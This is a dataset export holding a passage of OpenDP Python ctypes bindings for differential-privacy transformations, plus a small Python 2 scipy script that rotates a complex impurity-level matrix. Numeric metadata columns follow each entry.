:param bounds: Tuple of inclusive lower and upper bounds.
:type bounds: Tuple[Any, Any]
:param TA: type of data being imputed
:type TA: RuntimeTypeDescriptor
:return: A impute_uniform_float step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_impute_uniform_float
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, TA), Transformation))
def make_sized_bounded_mean(
size: int,
bounds: Tuple[Any, Any],
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the mean of bounded data.
This uses a restricted-sensitivity proof that takes advantage of known dataset size.
Use `make_clamp` to bound data and `make_bounded_resize` to establish dataset size.
:param size: Number of records in input data.
:type size: int
:param bounds: Tuple of inclusive lower and upper bounds of the input data.
:type bounds: Tuple[Any, Any]
:param T: atomic data type
:type T: RuntimeTypeDescriptor
:return: A sized_bounded_mean step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_sized_bounded_mean
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, T), Transformation))
def make_resize(
size: int,
constant: Any,
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that either truncates or imputes records with `constant` in a Vec<`TA`> to match a provided `size`.
:param size: Number of records in output data.
:type size: int
:param constant: Value to impute with.
:type constant: Any
:param TA: Atomic type.
:type TA: RuntimeTypeDescriptor
:return: A vector of the same type `TA`, but with the provided `size`.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=constant)
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
constant = py_to_c(constant, c_type=AnyObjectPtr, type_name=TA)
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_resize
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, constant, TA), Transformation))
def make_bounded_resize(
size: int,
bounds: Tuple[Any, Any],
constant,
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that either truncates or imputes records with `constant` in a Vec<`TA`> to match a provided `size`.
:param size: Number of records in output data.
:type size: int
:param bounds: Tuple of lower and upper bounds for data in the input domain
:type bounds: Tuple[Any, Any]
:param constant: Value to impute with.
:param TA: Atomic type. If not passed, TA is inferred from the lower bound.
:type TA: RuntimeTypeDescriptor
:return: A vector of the same type `TA`, but with the provided `size`.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
constant = py_to_c(constant, c_type=ctypes.c_void_p, type_name=TA)
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_bounded_resize
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_void_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, constant, TA), Transformation))
def make_bounded_sum(
bounds: Tuple[Any, Any],
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the sum of bounded data.
Use `make_clamp` to bound data.
:param bounds: Tuple of lower and upper bounds for data in the input domain
:type bounds: Tuple[Any, Any]
:param T: atomic type of data
:type T: RuntimeTypeDescriptor
:return: A bounded_sum step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_bounded_sum
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, T), Transformation))
def make_sized_bounded_sum(
size: int,
bounds: Tuple[Any, Any],
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the sum of bounded data with known dataset size.
This uses a restricted-sensitivity proof that takes advantage of known dataset size for better utility.
Use `make_clamp` to bound data and `make_bounded_resize` to establish dataset size.
:param size: Number of records in input data.
:type size: int
:param bounds: Tuple of lower and upper bounds for input data
:type bounds: Tuple[Any, Any]
:param T: atomic type of data
:type T: RuntimeTypeDescriptor
:return: A sized_bounded_sum step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_sized_bounded_sum
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, T), Transformation))
def make_sized_bounded_variance(
size: int,
bounds: Tuple[Any, Any],
ddof: int = 1,
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the variance of bounded data.
This uses a restricted-sensitivity proof that takes advantage of known dataset size.
Use `make_clamp` to bound data and `make_bounded_resize` to establish dataset size.
:param size: Number of records in input data.
:type size: int
:param bounds: Tuple of lower and upper bounds for input data
:type bounds: Tuple[Any, Any]
:param ddof: Delta degrees of freedom. Set to 0 if not a sample, 1 for sample estimate.
:type ddof: int
:param T: atomic data type
:type T: RuntimeTypeDescriptor
:return: A sized_bounded_variance step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
ddof = py_to_c(ddof, c_type=ctypes.c_uint)
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_sized_bounded_variance
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_uint, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, ddof, T), Transformation))
| 37.587747
| 133
| 0.714755
| 4,945
| 36,197
| 5.062892
| 0.056218
| 0.026282
| 0.034271
| 0.037386
| 0.838113
| 0.815386
| 0.780756
| 0.774285
| 0.767135
| 0.75012
| 0
| 0.000486
| 0.204161
| 36,197
| 962
| 134
| 37.626819
| 0.868608
| 0.487969
| 0
| 0.604775
| 1
| 0
| 0.04312
| 0.010177
| 0
| 0
| 0
| 0
| 0.068966
| 1
| 0.068966
| false
| 0
| 0.01061
| 0
| 0.148541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd3f7a9c4c4dd723f01f9dd16031296ff374b03d
| 10,664
|
py
|
Python
|
src/putils/findDiagonal/testRotation.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 7
|
2018-04-03T06:37:42.000Z
|
2021-11-08T11:44:06.000Z
|
src/putils/findDiagonal/testRotation.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | null | null | null |
src/putils/findDiagonal/testRotation.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 3
|
2016-10-27T20:23:34.000Z
|
2019-12-13T13:54:11.000Z
|
from scipy import *
from scipy import linalg
def mprint(Us):
for i in range(shape(Us)[0]):
for j in range(shape(Us)[1]):
print "%9.6f %9.6f " % (real(Us[i,j]), imag(Us[i,j])),
print
def StringToMatrix(cfstr):
mm=[]
for line in cfstr.split('\n'):
line = line.strip()
if line:
data = array(map(float,line.split()))
mm.append( data[0::2]+data[1::2]*1j )
mm=matrix(mm)
return mm
sT2C="""
0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
-0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
sT2C="""
0.000000 0.000000 1.000000 -0.000000 0.000000 0.000000 -0.000000 0.000000 -0.000000 -0.000000 0.000000 -0.000000 0.000000 0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.000000 0.000000
0.000000 0.000000 0.000000 -0.000000 0.000000 -0.000000 -0.000000 0.000000 -0.000000 -0.000000 -0.000000 -0.000000 0.000000 -0.000000 0.000000 -0.000000 1.000000 0.000000 0.000000 0.000000
-0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.692963 -0.000000 0.000000 0.000000 -0.366607 0.354260 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.366607 -0.354260
0.366607 0.354260 -0.000000 0.000000 0.000000 0.000000 -0.000000 0.000000 -0.366607 -0.354260 0.000000 -0.000000 0.692963 0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.000000 0.000000
-0.000000 0.000000 0.000000 -0.000000 0.000000 0.000000 0.720973 0.000000 0.000000 0.000000 0.352364 -0.340497 -0.000000 -0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.352364 0.340497
-0.352364 -0.340497 0.000000 -0.000000 0.000000 0.000000 -0.000000 0.000000 0.352364 0.340497 0.000000 -0.000000 0.720973 0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.000000 0.000000
0.000000 0.000000 0.000000 0.000000 -1.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000
0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 0.000000 0.000000
0.707107 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.707107 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000
0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.707107 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.707107 0.000000
"""
sT2C="""
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.72097658 -0.00000000 0.00000000 0.00000000 0.35236224 -0.34049559 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.35236224 0.34049559
-0.35236224 -0.34049559 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.35236224 0.34049559 0.00000000 -0.00000000 0.72097658 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.69295944 0.00000000 0.00000000 0.00000000 -0.36660865 0.35426221 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.36660865 -0.35426221
0.36660865 0.35426221 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.00000000 -0.36660865 -0.35426221 0.00000000 0.00000000 0.69295944 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
sEimp0="""
-1.60596 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.80166 -0.74845 0.00000 0.00000 -0.37295 -0.37079 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 -2.28610 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.46960 -0.46848 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 -0.10607 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.46960 -0.46848 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -1.77172 0.00000 0.00000 0.00000 -0.00101 -0.01135 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.37295 -0.37079
0.80166 0.74845 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.51129 0.00000 0.00000 0.00000 -0.00101 -0.01135 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.00101 0.01135 0.00000 0.00000 -0.51129 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.80166 -0.74845
-0.37295 0.37079 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.00101 0.01135 0.00000 0.00000 -1.77172 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 -0.46960 0.46848 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.10607 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 -0.46960 0.46848 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -2.28610 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.37295 0.37079 0.00000 0.00000 0.80166 0.74845 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -1.60596 0.00000
"""
Eimp0 = StringToMatrix(sEimp0)
T2C = StringToMatrix(sT2C)
print 'Det=', linalg.det(T2C)
REimp1 = conj(T2C) * Eimp0 * T2C.T
mprint( REimp1 )
| 133.3
| 260
| 0.615529
| 1,696
| 10,664
| 3.870283
| 0.044222
| 0.485375
| 0.527118
| 0.866545
| 0.943175
| 0.943175
| 0.943175
| 0.943175
| 0.941956
| 0.941956
| 0
| 0.82005
| 0.288166
| 10,664
| 79
| 261
| 134.987342
| 0.044658
| 0
| 0
| 0.217391
| 0
| 0.57971
| 0.939422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.028986
| null | null | 0.072464
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.